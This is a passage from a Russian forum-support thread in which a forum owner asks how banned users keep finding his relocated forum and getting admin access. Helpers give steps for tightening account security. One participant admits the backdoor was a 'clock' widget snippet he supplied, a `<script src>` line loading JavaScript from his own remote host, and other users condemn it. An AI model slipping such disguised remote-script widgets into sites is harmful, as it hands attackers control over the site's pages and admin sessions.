Важная информация!
Правила форума
для обязательного прочтения!
Пожалуйста, не регистрируйтесь на этом форуме с электронными адресами mail.ru, bk.ru, inbox.ru, list.ru - вам может не прийти письмо со ссылкой активации!
Вы можете воспользоваться адресами типа yandex.ru, rambler.ru, gmail.com и т.д.
(забыл / потерял пароль)
Общий FAQ по управлению форумом
FAQ: реклама на форуме
Туториалы по разным функциям ваших форумов
Алфавитный указатель
Интересные решения для форумов
Наши видео-туториалы
Условия пользования сервисом
Ссылки на полезные ресурсы
Последние темы
» ВПНавтор Danny_Marcelo Сегодня в 07:47
» Пропала вкладка "Обработка пользователей"
автор Svet007 Вчера в 07:39
» Как найти администратора?
автор PushPayer Ноябрь 21st 2024, 00:58
» Не корректное отображение картинок
автор VENEFICA. Ноябрь 15th 2024, 14:46
» Не меняется название форума
автор Aviator Ноябрь 14th 2024, 15:40
» Дублируется ссылка на форум в боковом меню
автор Чистый сталкер Октябрь 26th 2024, 21:13
» совет админам
автор лексей2222 Октябрь 23rd 2024, 05:45
» Проблема с гугл из-за Hitskin
автор Вултур Октябрь 21st 2024, 15:43
» [решено]Редактирвоание темы
автор AlexDarkTech Октябрь 13th 2024, 08:14
» Пропали иконки редактирования - HEEELP
автор Archaea Сентябрь 23rd 2024, 18:11
Как они нашли?
+8
darkWoL
Дед
Dana Domirani
Клер Эйн
Есения
JackaN
Krest
Amen
Участников: 12
Бесплатный форум: форум поддержки :: Взаимопомощь и Поддержка :: Разные проблемы :: [Архив] Разные проблемы
Страница 2 из 2
Страница 2 из 2 • 1, 2
Как они нашли?
Первое сообщение в теме :
Вобщем из за одних уродов пришлось менять адрес форума. Но они как то его нашли! Как?! Я его с этим адресом не индексировал в поисковиках и вообще нигде. Как они нашли его?
Вобщем из за одних уродов пришлось менять адрес форума. Но они как то его нашли! Как?! Я его с этим адресом не индексировал в поисковиках и вообще нигде. Как они нашли его?
Re: Как они нашли?
Amen, да какая хрен разница как нашёл. Ты что-нибудь для защиты делал? Пароли, e-mail'ы менял и всё что сказано здесь делал?
darkWoL-
как поменять пароль?как запретить регаца?как поменять в админке мэйл?как перестать участвовать в каталоге форумов?
Amen,
1.Как поменять пароль?
Ответ сейчас отправлю
2.как запретить регаца?
Ответ сейчас отправлю
3.как поменять в админке мэйл
Отправлю сейчас
1.Как поменять пароль?
Ответ сейчас отправлю
2.как запретить регаца?
Ответ сейчас отправлю
3.как поменять в админке мэйл
Отправлю сейчас
Клер Эйн- Дизайнер
-
Благодарности : 58
Вы один пользуетесь АП или кто-то еще "вхож" с правами админа?Amen пишет:Все, это конец.Сегодня он снова с утра как то нашел форум себя разбанил..я просто устал..я не понимаю как нашел форум,как залез в админку...теперь любой дурак которого я забаню может сам себя разбанить..
печально все это.. может, удалить форум и создать такой же тока другой..
Удалите запись "урода". Если нет записи, нечего и "разбанивать" будет, его просто не будет в учете.
1. ПА=>пользователи и группы=управление пользователями=выбираем свой ник=жмем на него=напишите в третьей строке новый пароль, а в четвертой его потвердите=сохранить. Но я посоветую вам для начало записать где-нить это пароль, а то потом могут быть в проблемы. Сохраните где-нибудь в компьютере.
2. ПА=пользователи и группы=параметры пользователей=возле третьего вопросительного знака надпись "Разрешать новые регистрации : " делаем нет=сохранить
3. ПА=>пользователи и группы=управление пользователями=выбираем свой ник=жмем на него=во второй строке меняем мэйл=сохранить
И все)
2. ПА=пользователи и группы=параметры пользователей=возле третьего вопросительного знака надпись "Разрешать новые регистрации : " делаем нет=сохранить
3. ПА=>пользователи и группы=управление пользователями=выбираем свой ник=жмем на него=во второй строке меняем мэйл=сохранить
И все)
Клер Эйн- Дизайнер
-
Благодарности : 58
Как да как...Amen пишет:Вобщем из за одних уродов пришлось менять адрес форума. Но они как то его нашли! Как?! Я его с этим адресом не индексировал в поисковиках и вообще нигде. Как они нашли его?
Зашли на help.forum2x2.ru
И пжалоста у тебя всё в профиле, указан адрес твоего форума...и искать ничего не надо...
Pure-
-
Благодарности : 228
опять сменил адрес форума, поменял пароль на 30 символов, сменил мэил, запретил регаца. И теперь конечно же мне ничего не страшно!!!!111
Ура товарищи!! Название сайта теперь-Радуга ЗАДРОТ11
И это никак не убирается. Весело, весело, весело!!!
[сообщение отредактировано спасателем JackaN'ом]
И это никак не убирается. Весело, весело, весело!!!
[сообщение отредактировано спасателем JackaN'ом]
Тема баян...
Pure-
-
Какую?
Pure-
-
Да хоспаде, поди кто нибудь переменную в сообщение написал да и всё....Название сайта теперь-Радуга ЗАДРОТ
Pure-
-
Соадмин
Pure-
-
Как? как? как?Lucky пишет:А ведь ни один из вас так и не ответил на этот самый элементарный легкий вопрос. И ФФ тут совершенно непричем.Но они как то его нашли! Как?!
Нагородили на 2 страницы черти чего.
Pure-
-
Да очень просто. При смене адреса форума, он какое то время доступен по 2-м адресам, то есть со старого адреса идёт переадресация на новый. Вот и всё.
С Уважением, Lika
Lika- Администратор
-
Благодарности : 287
Не, не так все было. Мы ему еще в начале часы помогли поставить. Дали ему конечный код, который ему требовалось вставить.
Код был примерно такой:
Но, заметьте, мы ничего плохого до этого не делали и получили по бану. Потом одного вовсе удалили. Ну я и решил воспользоваться той уязвимостью
Код был примерно такой:
- Код:
<script src="мой_далекий_хост/1.js" ></script>
Но, заметьте, мы ничего плохого до этого не делали и получили по бану. Потом одного вовсе удалили. Ну я и решил воспользоваться той уязвимостью
Вообще-то такое поведение называется подлостью и в жизни жестоко карается, чтобы впредь неповадно было гадить другим. Такое делают только хакеры-отморозки по тупой злобе или ради тупого "интереса".Koorya пишет:Не, не так все было. Мы ему еще в начале часы помогли поставить. Дали ему конечный код, который ему требовалось вставить.
Код был примерно такой:Ну а дальше и так понятно.
- Код:
<script src="мой_далекий_хост/1.js" ></script>
И что? Куры у вас перестали нестись или корова померла? Нанесено тяжкое оскорбление реальной личности, или просто нику, с которым любой админ имеет право поступать как хочет (в меру своей воспитанности)? Вы же приняли правила игры, так на что "обиделись"? А вы просто озлобились и решили нагадить. Причем, не только админу, но и другим, которые к вашему "оскорбленному самолюбию" никакого отношения не имели. Слава богу, что вы не нарвались на серьезных людей с возможностями наказать в реале за такие действия.Koorya пишет:Да нас там банили не по правилам вовсе.
Дед пишет: Слава богу, что вы не нарвались на серьезных людей с возможностями наказать в реале за такие действия.
та я с другой страны ваще
Дед, так ну а мы что плохого сделали? И удалили не просто какой-то там ник на форуме, а запретили реальному мне писать там. Не говоря о сообщениях от админа на моем ящике..
зы Надеюсь всех назвал
Кому это еще? На форуме писали только админ, тоха(которого все равно удалили), димедрол(который там оочень долго не появлялся, и скорее всего вообще забил на форум), мой друг(который тоже забил на форум после примерно 15 сообщений), и кто-то там не известный мне человек, тоже очень мало писавший. А остальные были там просто для количества.Причем, не только админу, но и другим, которые к вашему "оскорбленному самолюбию" никакого отношения не имели
зы Надеюсь всех назвал
Koorya пишет:И удалили не просто какой-то там ник на форуме, а запретили реальному мне писать там.
про айпишник чтоле
Amen, Koorya,
добрый день,
вопрос о том, как нашли ваш сайт, думаю, решён. Пожалуйста, ведите дальнейшие дискуссии где-нибудь в другом месте. Тема считается закрытой. Если есть какие-либо существенные вопросы - задавайте новой темой.
Удачи в решении спора!
добрый день,
вопрос о том, как нашли ваш сайт, думаю, решён. Пожалуйста, ведите дальнейшие дискуссии где-нибудь в другом месте. Тема считается закрытой. Если есть какие-либо существенные вопросы - задавайте новой темой.
Удачи в решении спора!
JackaN-
-
Благодарности : 167
Страница 2 из 2 • 1, 2
Бесплатный форум: форум поддержки :: Взаимопомощь и Поддержка :: Разные проблемы :: [Архив] Разные проблемы
Страница 2 из 2
Права доступа к этому форуму: